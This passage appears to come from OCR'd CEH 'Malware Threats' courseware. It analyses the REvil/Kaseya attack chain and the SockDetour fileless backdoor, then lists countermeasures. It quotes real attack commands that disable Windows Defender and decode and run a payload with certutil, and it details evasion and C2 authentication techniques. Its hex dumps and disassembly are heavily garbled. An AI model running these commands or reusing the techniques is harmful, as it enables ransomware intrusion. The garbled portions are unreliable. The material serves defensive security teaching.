-DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled SubmitSamplesConsent NeverSend & copy 1%

Cc: \Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\\agent.crt c:\\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\\agent.exe”

The above command also replaces certutil.exe with the environment variable %SystemDrive%\cert.exe and then decodes the agent.crt file to agent.exe, which then drops another payload to avoid detection. agent.exe

d55£983c994caal

Module 07 Page 1174

60ec63a5 9f 6b4250fe67 Fh3e8c43a388aec60a4a6978e9F1le

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Exploitation In this phase, the ransomware is dropped along with its components and executed on the target systems. For example, in the Kaseya supply-chain compromise, after dropping the payload, removes previously used binaries such as agent.crt and certutil.exe. The decoded agent .exe comprises internal components such as SorTis and MoDLIS, as shown in the screenshot. 43 "MODLIS" =

© 102 - [lang:1033]

*SoFTIs" {© 101 -[lang:1033]

a i Offset doo00000 ooooo010 ooooo020 ooo00030 ooooo040 ooooo0so ooooo060 oo000070 ooooo080 ooooo030 ooooo0a0 ooo000B0 oogooaco oooo00D0 oooo00ED ooooo0Fo 0000100 ooo00110 00000120 00000130 oo000140, oooo01so ooo00160 00000170 ooooo180 00000130 ooo001a0 oo0001B0 oooo01co o00001D0 oog001E0 oo0001FO oo000200 00000210 00000220 00000230 ooo00240 ooo00250 00000260 00000270 ooo00280 0000290 ooo002a0 o00002B0 ooo002co ooo002D0 o00002E0 oo0002Fo ooo00300 00000310 00000320 00000330 00000340 00000350 ooo00360, 00000370 oo000380 00000330 ooo003a0 000003B0

0 aD BE 09 oo OE 69 74 6D AS az az ES EC EC 00 6a OB Es 00 0s AG 00 30 00 oo 00 00 50 00 00 2E oo 00 64 00 2E oo 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00

1 oy 00 00 0 1F 73 20 6F 78 48 48 61 4B 4B 0 B7 on FC 10 00 SB a0 BF 00 3E 00 00 BS 20 a0 74 OE 00 ag 00 64 20 00 61 00 00 00 0 00 00 0 00 00 0 00 00 00 00 00 00 00 00 0 00 00

ie 2 30 00 00 00 BA 20 62 64 DA SS S4 27 5 6A 00 DD oc 05 00 on oc 10 09 00 oc 00 00 09 07 00 65 07 00 02 00 61 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

3 00 00 00 00 OE 70 65 65 86 DS DS DS DS DS 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

4 03 00 oo 00 oo 72 20 2E EL cea 7c ES EO EO oo oo 00 oo oo 00 03 00 85 00 88 00 00 40 68 00 74 oo 20 oo 00 61 oo 40 oo oo 00 oo oo 00 oo oo 00 00 oo 00 00 oo 00 00 oo 00 00 oo 00 00

5 00 00 00 00 Ba 6F 22 oD 13 13 19 13 13 19 a0 00 OE 10 02 00 09 10 oo 09 15 a0 09 00 o1 00 00 04 00 20 oo 00 BC 00 30 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00

6 00 00 00 0 09 67 75 op Ba Ba Ba Ba Ba Ba 00 oo 07 00 00 00 40 0 00 00 00 00 00 00 00 00 00 00 00 07 00 00 09 00 oc 00 00 00 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

7 00 00 00 00 fo] 72 6E oA Ds DS DS Ds Ds DS 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 co 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

A cry 40 oo 00 21 61 20 24 El a? 54 El EC 52 50 a0 00 oo os 00 00 oo 18 a0 oo 00 00 oo 00 00 42 00 2E oo 00 00 00 2E oo oo 00 00 oo 00 oo 00 00 00 00 00 oo oo 00 00 00 00 00 00 00 00

9

00 00 00 00 BB 6D 69 00 19 48

A

00 00 00 00 01 20 6E 00 B4 6B

BC

00 00 00 00 4C 63 20 00 DS DS

DE

F | Ascii

FF 00 00 E8 CD 61 44 00 E1 FB

FF 00 O0 00 21 6E 4F 00 19 19

8B

19 B4 DS

00 o0 oo O0 54 6E 63 00 B4 Bé

00 oo oo 00 68 6F 20 00 DS DS

[MZ .¢..J...¥y @ é | on. °.1!, LI!Th | is. program.canno | tbe.run. in. DOS | node 6 pdt’ | Fx % | SHUOE

ra 87 54 DS AB 18 B4 DS | SHTO|b’OTITOcct’

19 BS DS

4B 69 45 00 68 20 00 AO 00 00 Co 00 30 00 00 00 00 00 OD 00 72 AA 00 5C 00 72 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

68 63 00 00 05 07 01 OC 10 00 09 00 OC 00 00 00 00 00 07 00 64 02 00 02 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

DS 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 00 00 00 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EO El 4c EO 00 00 00 00 00 10 50 oO 00 00 oO G0 00 00 00 00 74 00 40 00 00 6F 00 40 00 00 00 00 00 O0 00 00 OO 00 00 OO 00 00 OO 00 00 OO 00 00

19 19 01 00 00 00 O00 04 10 00 00 00 61 00 00 00 0 0 10 00 61 12 00 DO 00 63 Dc 00 00 00 0 0 00 00 0 00 0 0 00 a0 0 0 0 0 00 0 O0 0

B4 B4 04 02 00 00 O06 00 O09 00 00 O09 00 00 O09 00 00 O9 00 00 00 07 00 09 00 00 OB 00 00 00 O90 00 Oo O90 00 00 O90 00 00 O90 00 00 O90 00 00 O90 00 00

DS DS 00 21 00 10 Oo 00 00 00 00 O90 00 00 00 09 00 o0 00 00 00 00 40 00 00 00 00 42 00 oD oo 00 0D 00 oO oD 00 00 00 00 00 00 o0 00 00 00 00 00

| éa'det OabyOut’

| ikUOal’OikhOst’ is] | ikjOat‘ORichd}’ 6 PE..L4 |3-¥ ani |e | ei | + | I wa Pee t+ +. 4 + | ¢..4..-1A.-P | >be. Ons | Pi. | | | |

@ oh ‘text. Ble. 4 fe. 4 ‘indata Jay... 8). 10 @..@ data yD 42M .a...08..b... ter eB

Figure 7.126: agent.exe resources

These two components are dumped into the Windows folder in the form of MsMpEng.exe and mpsve.dil. While the first resource can be a simple defender binary, the second (mpsve.di1) is an REvil encryptor binary that leads to a DLL sideloading attack. Module 07 Page 1175

| Hacking and Countermeasures Copyright © by E6-COl All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats stextrO13EL0FC ‘text :01361101 ‘eext:013€1103 Teextie13€1105 Teexeie13€1107 ‘text 01361109 Teext:0n3e110F Teextie13e1110 ‘eext:O13E1112 eextien3ei118 Teext:O13EL11A Teexts€1361120 ‘eext:01361121 ‘eextien3e1127 Teexti@13EL120 Teexti@13e1i2€ ‘text :01361130 ‘Teext:01361135 Teexti013€1137 ‘ext 201361139 ‘text 01381138 Teext:013€113¢ Teextse13e1136 ‘eext:O13E113F Teextien3e1185 Teext013E1167 Teexese1361149 eext:O13E114A Teexti0n3e1150 Teext:013E1155 Teexti@13E1isA text 13E115F Teextion3ei61 Teexti@13E1166 ‘text :013E116C Teexti@n3E1171 Teext:013€1178 Teext:@13E1170 ‘eext:O13E1184 Teexti0n3e1189 Teext0n3E118A Teexti@13€1188 ‘text 0138119 Teext:0n3e1191 Teexesen3e1192 ‘eext:01361193 Teext:@13€1196 Teext:0n3€1180 Teexti@n3ELiAl

68 68 68 FF 85 OF 50 68 FF 35 OF 50 FF 63 6A 62 3 FF 85 74 50 33 56 FF 35 74 5¢ FF 63 8A Ad 38 £5 88 6A C7 £6 C7 65 56 56 68 56 56 56 FF (7 50 FF

04 65, 00 D6 Co 84 00 15 co 64 15 14 66 08 40 06 Co 6C F6 15 co 5 15 24 88 Aa C5 9 00 DO 04 63 04 AS

1¢ 3F @1 96 00 00 00 20.00 3€ 01 8700.60.00 18 00 3€ 01 10 3F et 43 3F 01

20 00 3€ 01 18 00 1¢ 3F 55 0C 43 3F Fe FF 4043 56 00 24 38 Fe FF 24 EC 43 3F

3€ 62 00 @1 FF 3F 00 1C FF 43 01

01 @1 3F 3F

30 02 ©0 00 75 10 05 AS 43 5F 01 15 2600 3 @1

Exam 312-50 Certified Ethical Hacker

push offset Type SOF push 65h 5 plone push 0 3 edule €all esi; Findesourcel! test eax, eax © jz_— _loc 13€1147 push eax + hestnfo push } hildule alls Loadesource test eax, eax © jz Loe. 1381147 push eax 5 bResbata fall dssLockResource ooLrs' push offset attodlis push 65h 5 Apane push 8 5 biodule ov dvord_13F4340, eax €all esi; FindRescurcew test eax, eax jz short loc 1361147 Push eax. 5 Restafo yor esi, est push esi. 5 bodute fall dssLoadResource test eax, eax je short loc 1321147 push eax 5 bResbata Eel] dssLockResource push offset. atpsveD11 ==] moved, C5588 tov dword_13F4344, eax mov eck, eax Call rite File_tn_windows_folder mov eex, dword_13F43A0 mov ed, S600h 01 mov [esptdtlpProcessinformation], offset attsmpengexe call rite File In windows folder G1 mov__[esprtlpProcessInforaation], offset ProcessInformation 7 IpProcessInformation push offset startupinfo 5 Ipstartupinfo push esi 5 Apcurrentoirectory push esi } penvironsent push 230h 3 deCreationFlags push esi } binherithandles push esi } Ipthreadattributes push esi ApProcessAteributes Push [ebp#1pConmandL ine] 1pCommandLine 48 Ootmov — Startupinfo.cb, ath push eax 5 IpApplicationtiane call dssCreateProcessit Figure 7.127: Binaries dropped by agent.exe

As soon aS MpMseng.exe executes and invokes the export function (servicecrtMain), the REvil encryptor (mpsve.di1) loads and executes itself. -text:10001290 stext:10001290 text text. text: text: text: text: text: ‘text: text: text text text. text stext text text text. text: text: text: text: text: text: text text text. text text text text. text: text: text:

20 10 21 07 10 20 08 21 07 10

public Servicecrttain ServiceCrttlain proc near D vars duord ptr -8 ThreadId duord ptr -4 push —ebp. mov ebp, esp sub esp, & lea eax, [ebp+Threadtd] push eax 5 Ipthreadrd push @ 3 dwCreationFlags push 0 3 IpParameter push offset StartAddress ; IpStartaddress 5 dwStacksize push } Ipthreadattributes push call reateThread mov [ebptvar_s], eax ‘oc_10001280: 5 CODE XREF: ServiceCrtMaint34tj mov ecx, 1 test ecx, ecx jz short loc_100012¢6 push 38h 5 duttilliseconds call ds:Sleep jmp short loc_10001280 ‘oc_100012¢6: yor mov pop retn Servicecrttiain endp

5 CODE XREF: ServiceCrtaint27tj edx, eax esp, ebp ebp.

Figure 7.128: MpMseng.exe invoking ServiceCrtMain

Module 07 Page 1176

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

The REvil exploits OpenSSL to perform cryptographic activities such as file encryption.

sve sve sve sve

38 08 BC BE ro ca FS 2 BC cy 88 ca :10001588 88 CS :10001580 :10001580 :10001580 SE 1000158 C3

21 07 10 02 00 00 OE 02 00 ac 00 09 00 £8 05 00 ac

oc_10001590: push 58h push offset _aCryptoEvpEvpen push ch call near ptr unk_10002830 mov esi, eax add esp, @Ch test esi, esi jz short loc_10001580 push ch push 8 push esi call near ptr unk 1005FE40 add esp, @Ch mov eax, esi oc_10001580: pop esi retn

3 CODE XREF: mpsvc:1000101C1; 3 ".\\erypto\\evp\\evp_ene.e

5 CODE XREF: mpsvc:mpsve_SvchostPushServiceGlobals+28915

Figure 7.129: Exploiting OpenSSL

2189000 20140010 2189020 20180030 2e1A9040 2010050 20180060 20140070 20180080 20180090 2e1A0080 2@1A90c0 2@1A9000 201A00% e @ @ 2 2 2 @ 2 ° 2 @ 2 2014020 2

SRSSSSSSSASSSRSSSSSSSSSSSSSSSISES SOSSSSSSSASSSSTRISSSSSSSSSSSISSIS sssssss SRSSSSSSSSSSSSSSSES SSSSSSSSSSSSSSSSSSSSSSSSSSSSSESES SSSSSSSASSSSSSSSSASSSSSSSESSESSES SSSSSSSLSSSSSLESSSLSSSSSSSSSSSSSES SSSSSSSSSSSSSSSESSHSSSSSSSSSSSESIE ISSSSSSSSSSSSSSSSLSSSSSSSSSSSSSSIES SSSSSSSSSSSSSKSTSESSSSSSSSSSSSSEL SRSSTSSSSSSSSSSELESSSSSSSSSSSESEE SSSSSSSSSSSSSLSSRESSSSSSSSSSSESIS SSSSSSSSSSSSSSSSSSSSSSSSSSSSISIIS SSSSTSSSSSSSSSSSSSSSSSSSSSSSSSSSF SRSSSSSSSSSSSSSSLESSSSSSSSSSSESIF SSSSSSSSSSSSSESSSSSSSSSSSSSSSIESIS SSSSSSSSSSSSSSSSSSSSSSSSSSSSMSSSS

The ransomware allocates new memory and drops the actual payload using functions such as CreateFileMappingW and MapViewOfFile.

2

Figure 7.130:

Module 07 Page 1177

Actual payload

| Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Now, REvil exposes its typical ransom behavior of changing config files, changing local firewall rules, creating its own registry keys, and adding its own values to the registry keys. With all these activities, the attackers now automatically log into the victim system with their own accounts, encrypt all the victim’s confidential files, and display a ransom note, as shown in the screenshot.

Figure 7.131: Ransom note threatening the user/victim

=

Lateral Movement In targeted attacks, attackers perform PsExec tools.

=

lateral movement, for which they use RDP and

Defense Evasion and Discovery At this stage, attackers use network discovery tools such as AdFind, SharpSploit, BloodHound, and NBTScan to discover and infect other systems connected to the target network. The following techniques are used by REvil for defense evasion: o

PC Hunter and Process Hacker related to antivirus products

0

KillAV, a custom malicious binary specifically designed to uninstall antivirus products by either querying the uninstall registry and uninstalling the program associated, or by terminating processes from its list

Module 07 Page 1178

to identify and

terminate

services and

processes

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

o

Safeboot routine, which is triggered when “-smode” is supplied as an argument and creates various new variants with RunOnce registries to restart from or to Safemode and bypass security solutions

o

DLL sideloading to bypass detection by running as a legitimate file or process

o

PowerShell Defender

commands

to

compromise

the

supply

chain

and

disable

Windows

Credential Access and Exfiltration At this stage, attackers use tools such as SharpSploit, an attack framework, along with the mimikatz module to gain credential access. Further, they obtain the gathered information using different methods such as FTP transfer via FileZilla or the use of thirdparty synchronization tools such as MegaSync, FreeFileSync, and Rclone.

=

Command and Control (C2) At this stage, the REvil ransomware sends a report and system information to the attackers’ C2 server. This is performed by creating a pseudorandom URL based on the following fixed format: https://{Domain}/{String characters}.{String 3}

1}/{String

2}/{random

The domain and strings have the following meanings: Domain: String admin,

String assets, String

Module 07 Page 1179 :

from

a

list

based

1: wp-content, data, or news

2: or 3:

images, pics jpg,

png,

on

the

include,

pictures,

configuration content,

image,

temp,

uploads,

tmp,

static,

graphic,

gif

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

Fileless Malware Analysis: SockDetour

|G SockDetour is fileless malware that compromises a Windows system’s legitimate processes and builds a secure C2 communication channel @ Itcreates a stealthy backup backdoor that can continue its operation even after the primary backdoor is detached from the infected machine Legitimate with 2 listeniprocess ng port

@njon.c2 requests are directed to t original services

Legitimate service port

SockDetour Infection Flow

Ahook is bound to the ‘Winsock accept) functio

using the Detours library

@, Powersploit memory injector injects shelleode into the target's process PowerSploit [>= memory injector

‘SockDetour establishes a C2

connection with the attacker

© sockdetouris loaded DonutLoader shellcode is injected into the target's process ttps:/funit2 pateaitonet works com cerved. Reproduction is Strictly Prohibited

SockDetour Fileless Malware Attack Stages

CE H

@ SockDetour is hosted on a compromised FTP server such as network-attached storage (NAS) andis Pre-exploitation | delivered to the target process by exploiting remote code execution vulnerabilities |@ SockDetour is a customized backdoor assembled in the 64-bit PE file format Initial Infection

Exploitation

| @

Attackers use the Donut shellcode generatorto convert SockDetour's 64-bit PE file into shellcode and

then use the PowerSploit memory injectorto inject this code into the target process

|@ The backdoor uses the Microsoft Detours library package to hijack a network socket

| |@ The backdoor uses the DetourAttach() function to bind a hook to the Winsock accept() function |@ New connections to the target service’s port are forwarded to the malicious detour function definedin SockDetour

@ After verification, a remote C2 channel is established between the attacker and the target legitimate Postexploitation | process on the client’s machine st-exploitation |@ SockDetour performs socketless and fileless operations over time as the backup backdoor, even if the primary backdoor is detected and removed from the compromised machine cerved. Reproduction is Strictly Prohibited

Module 07 Page 1180

| Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

SockDetour Fileless Malware Attack Stages (Cont’d) Client Authentication and

C2 Communication After Exploitation

Plugin Loading Feature |@ Using the shared session key, the received final payload

@ SockDetour verifies and validates C2 connections

comme nner

"Cecesooeou7reransaas7

ferteoseettoneed otmonreranee? ‘ent ooe7rertea5 ene oooerreranaase

ws

woe

3

voc

CE H

data are encrypted

wont

_pookingruncs8715

@ The received payload data are encodedin the JSON format with two objects app and args after its decryption

SS

‘@ The app object holds a base 64-encoded DLL, and the args

= in

{

Se Eoptaaneue mee

i authentication ‘ication isi achieved, the malware @ Once client takes control over the TCP sessionvia the recv ()

object holds an argument set to be transferredto the DLL:

"sock": hijacked_socket, "key": session_key,

args": arguments_received_from_client s — ron

y

function without addingthe “MSG_PEEK” option

@ The plugin can interact via the hijacked socket and encrypt the TLS transactionvia the above-generated session key @ Inthis manner, SockDetour serves as a stealthy backup backdoor

@ Itgenerates a 160-bit session key through the hardcoded initial vector value bvyiafszmkjsmagl and transmits it to the remote client to encrypt the

communication over the hijacked connection

Fileless Malware Analysis: SockDetour Source: https://unit42.paloaltonetworks.com SockDetour is fileless malware that compromises a Windows system’s legitimate processes and builds a secure C2 communication channel without requiring a listening port to be open. Using SockDetour, attackers create a stealthy backup backdoor that can continue its operation even after the primary backdoor is detached from the infected machine. Owing to its socketless and fileless nature, it is difficult to detect on infected Windows servers. The malware is distributed through C2 infrastructure, i.e., a compromised FTP server that hosts ASP web shells and memory dumping tools.

ate process with a listening port

@ Non-c2 requests are directed to their

original services

Legitimate service port

Ahook is bound to the Winsock accept() function,.. using the Detours library

@ , Powersploit memory injector injects shellcode

into the target's process

SockDetour

t---;---!

SockDetour establishes a C2

connection with the attacker i |

. = DonutLoader | Shellcode

SockDetour is loaded

DonutLoader shellcode is injected into the target’s

process

Legitimate process with a listening port Figure 7.132: SockDetour infection flow

Module 07 Page 1181 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

SockDetour Fileless Malware Attack Stages Pre-exploitation SockDetour is hosted on a compromised FTP server such as network-attached storage (NAS) and is delivered to the target remote process by exploiting some common vulnerabilities such as RCE. These types of vulnerabilities allow a custom backdoor to hijack legitimate processes and network connections of a socket and create a C2 connection with remote attackers through the socket. Initial Infection SockDetour is a customized backdoor assembled in a 64-bit PE file format. It is created as a backup backdoor so that the malware remains active even if the primary backdoor is detected and removed. It mainly targets Windows OSes that run services on TCP ports. To hijack the socket of any existing process, SockDetour must be integrated with the memory of the target process. To achieve this, attackers use the Donut shellcode generator to convert SockDetour’s 64-bit PE file into shellcode. Then, using the PowerSploit memory injector, attackers inject this code into the target process. The SockDetour PE can appear as follows: Ob2b9a2ac4bff£81847b332af18a8e0705075166a137ab248e4d9b5cbd8b 960d£

The PowerSpoit code injection appears as follows: 80ed7984a42570d94cd1b6dcd8

9£95e3175a5c4247ac245c817928dd07£c9540

bee2f£e0647d0ec9f2£0aa5£784b122aaebalNcddb3 9b08e3eal 9dd4cdb90e53£9 a5b9ac1d0350341764£877£5c4249151981200d£0769a38386£6b7c8ca6£9cTa 607a2ce7dc2252e9e582e75

7bbfa2f18e3£3864cb4267cd07129£4b9a241300b

11b2b719d6bffae3ab1e0£8191d70aalbade7 £59 9aeadb7358£722458a21b530 cd28c7a63£91a20ec4045cf40££0£93b336565bd504c9534be857e971b4e80ee ebe926£37e7188a6£0cc8574437 3ea2bf2a6b039071b8

6cdc672e495607£85ba3cbee6980049951889

90£03b5987d9135f£e4c036£b77£477£1820c34b341644e

7e9cf2a2dd3edac92175a3eb1355c0£5£05£47b77

98e206b470637c5303ac79£F

bb48438e2ed47ab692d1754305d£664cda6c518754ef

9a58fb5fa8545£5bfb9b

Exploitation After SockDetour is injected into a legitimate process, the backdoor uses the Microsoft Detours library package (API calls monitoring and instrumentation) to hijack a network socket. The backdoor uses the DetourAttach() function to bind a hook to the Winsock accept() function. When new connections are initiated to the target service’s port, the Winsock accept() function is invoked, and the call to the accept() function is forwarded to the malicious detour function defined in SockDetour. Other non-C2 requests are directed connections are not interrupted. Module 07 Page 1182

to their original

services

to ensure

that those

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Post-exploitation

All incoming requests can be hijacked by SockDetour to verify, validate, and segregate the legitimate service traffic and C2 traffic. After verification, a remote C2 channel is established between the attacker and the target legitimate process on the client machine. After successful implementation, SockDetour performs socketless and fileless operations over time as the backup backdoor, even if the primary backdoor is detected and removed from the compromised machine. Client Authentication and C2 Communication After Exploitation

The malware verifies and validates C2 connections as follows: o

The authentication

data from the client are shown

in the table below.

Initially, 137

bytes of data are expected from the client for authentication.

17 03 03

AA BB

cc pp EE FF

Fixed header value an to disguise TLS traffic

. Size of the ayload data Paylo

Four-byte variable . used for client authentication

| block 228-byte data | Data signature for oor client authentication data block

Table 7.6: Data structure of SockDetour client authentication

o

Examine the initial 9 bytes of data, which are obtained using the recv() function along with the option MSG_PEEK since it does not interrupt the legitimate service’s traffic even after discarding data from the socket queue.

o

Check if the data begin with 17 03 03, which is a commonly recorded header for TLS transactions during encrypted data transmission, which can be shown only after performing the appropriate TLS handshake.

. text :@00007FEFAB84823 000007FEFAB84823 loc_7FEFAB84823: 200007FEFAB84823 mov 000007FEFABB4829 mov 000007FEFABB482F lea 000007FEFAB84837 mov 200007FEFAB8483C call 200007FEFABB4842 mov 000007FEFABB4847 mov 000007FEFABB484C mov 000007FEFAB84851 mov 200007FEFAB84857 lea 200007FEFABB485C lea : 000007FEFABB4864 call . text :@00007FEFAB84869 test

3 CODE XREF: _hookingFunc+87tj rod, MSG_PEEK ; flags red, 9 3 len rdx, [rsp+218h+ RecvBuf] ; buf rex, [rsp+218h+s] ; s cs:recy 3 recv 9 bytes [rsp+218h+8uf2], 17h [rsp+218h+var_103], 3 [rsp+218h+var_1D2], 3 r8d, 3 3 Size rdx, [rsp+218h+Buf2] ; Buf2 rex, [rsp+218h+ RecvBuf] ; Bufl memcmp 3 data should start with 17 @3 03 eax, eax

Figure 7.133: SockDetour receiving and verifying data

o

Check if the payload data size (AA

Module 07 Page 1183

BB) is not greater than 251.

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats o

Exam 312-50 Certified Ethical Hacker

Check if the next four bytes of the payload (CC conditions: e

The result is 88

a0

90

DD

EE

FF) satisfy the following

82 after performing bitwise AND with 88

a0

90

82.

e

Theresultis fd

£5

£b

ef after performing bitwise OR with fd

£5

fb

ef.

Now, examine the complete 137 bytes of data from the same socket data queue with the option MSG_PEEK for further authentication. Then, create a 24-byte data block as shown in the table. 08 13

1c 3a

cl d7

78 Of

d4 ab

10 bytes hardcoded in SockDetour

cc

DD

EE

b3 03

FF

Four bytes received from the client for authentication

a2 e8

b8 ££

ae 3b

63

bb

10 bytes hardcoded in SockDetour

Table 7.7: Block data to be verified for client authentication

Using an embedded public key against the 128-byte data signature in the above table, the above 24-byte data block is hashed and verified. The data signature is generated by signing the hash of the same 24-byte data block through its corresponding private key. Client authentication is achieved with the above steps. Now, the malware takes control over the TCP session via the recv()

function without adding the MSG_PEEK

option

because the session is already verified for backdoor persistence. Further, SockDetour generates a 160-bit session key through a hardcoded initial vector value bvyiafszmkjsmqgl. Now, the malware transmits it to the remote client using the data structure given in the below table. 17

03

03

AA

CC

BB

FF

Fixed header alue to Payload data . y ve u . disguise TLS | size traffic

DD

EE

| Session ke Y length

:

session_key

160-bit session ' ' key

.

| random_padding

Random padding

Table 7.8 SockDetour session key sent to the client

As a result, the C2 connection can be encrypted over the hijacked socket as the session key is already shared between SockDetour and the remote client.

Module 07 Page 1184

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Plugin Loading Feature Being a backup backdoor, SockDetour can load a plugin DLL. After successful sharing of the session key, the malware receives four bytes of data from the client, where four bytes is the size of data that SockDetour receives for final payload delivery. Using the shared session key, the received final payload data are encrypted. The received payload data will be encoded in the JSON format with two objects app and args after its decryption. The app object holds a base 64-encoded DLL, and the args object holds an argument set to be transferred to the DLL. Now, the malware loads this plugin DLL into the newly allocated memory space and invokes an export function ThreadProc, along with the argument given in the following JSON structure:

{ "sock":

hijacked_socket,

"key": "args":

session_key, arguments_received_from_client

} As plugin DLL samples were not identified, the argument given above informs that the plugin can interact via the hijacked socket and encrypts the TLS transaction via the above-generated session key. In this manner, SockDetour serves as a stealthy backup backdoor.

Module 07 Page 1185

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

CEH

LO#07: Explain Malware Countermeasures

Strictly Prohibited

Malware

Countermeasures

Malware is commonly used by attackers to compromise target systems. Preventing malware from entering a system is far easier than eliminating it from an infected system.

This section presents various countermeasures that prevent malware from entering a system and minimize the risk it causes upon entry.

Module 07 Page 1186

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

CEH

Trojan Countermeasures

ze

eo

Dey

bs

Avoid opening email attachments received from unknown senders

Avoid downloading and executing applications from untrusted sources

Blockall unnecessary ports at the host and firewall

Install patches and security updates for the OS and applications

Avoid accepting programs transferred by instant messaging

Scan external USB drives and DVDs with antivirus software before using them

Harden weak, default configuration settings, and disable unused functionality including protocols and services

Restrict permissions within the desktop environmentto preventthe installation of malicious applications

Monitorthe internal network trafficfor odd ports or encrypted traffic

Run host-based antivirus, firewall, and intrusion detection software

Trojan Countermeasures Some countermeasures against Trojans are as follows: Avoid opening email attachments received from unknown senders. Block all unnecessary ports at the host and use a firewall. Avoid accepting programs transferred by instant messaging.

Harden weak default configuration settings and disable unused functionalities, including protocols and services. Monitor the internal network traffic for odd ports or encrypted traffic. Avoid downloading and executing applications from untrusted sources. Install patches and security updates for the OS and applications. Scan external USB drives and DVDs with antivirus software before using them. Restrict permissions within malicious applications.

the

desktop

environment

to prevent

the

installation

of

Avoid typing commands blindly and implementing pre-fabricated programs or scripts. Manage local workstation file integrity through checksums, auditing, and port scanning. Run host-based antivirus, firewall, and intrusion detection software.

Avoid clicking on unsolicited pop-ups and banners. Exercise caution in the use of peer-to-peer file sharing. Prefer ISPs that provide network security and have robust anti-spam techniques. Module 07 Page 1187

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Disable the autorun option for external devices such as USB drives and hard drives.

=

Check the Secure Socket Layer (SSL) authenticity website to avoid information sniffing.

Module 07 Page 1188

before

accessing any e-commerce

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Backdoor Countermeasures

CE H

|

|

|

2 |

Educate users to avoid installing applications

3 |

Avoid untrusted software and ensure that every device is protected by a firewall

|4 |

Use antivirus tools such as Bitdefender, and Kasperskyto detect and eliminate backdoors

|

Track open-source projects that enter the enterprise from untrusted external sources, such as open-source code repositories

|

| 6 |

Most commercial antivirus products can automatically scan and detect backdoor programs before they can

cause damage

downloaded

from untrusted Internet sites and email attachments

Inspect network packets using protocol monitoring tools

Backdoor Countermeasures Some common countermeasures against backdoors are as follows: Most commercial antivirus products can programs before they can cause damage.

automatically

scan

and

detect

backdoor

Educate users to avoid installing applications downloaded from untrusted Internet sites and email attachments. Avoid untrusted software and ensure that every device is protected by a firewall. Use antivirus backdoors.

tools

such

as

Bitdefender

and

Kaspersky

to

detect

and

eliminate

Track open-source projects that enter the enterprise from untrusted external sources such as open-source code repositories. Inspect network packets using protocol monitoring tools.

If a computer is found to be infected by backdoors, restart the infected computer in the safe mode with networking. Run registry monitoring tools to find malicious registry entries added by the backdoor. Remove virus.

or uninstall the program

or application

installed by the backdoor Trojan

or

Remove the malicious registry entries added by the backdoor Trojan.

Delete malicious files related to the backdoor Trojan.

Module 07 Page 1189

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

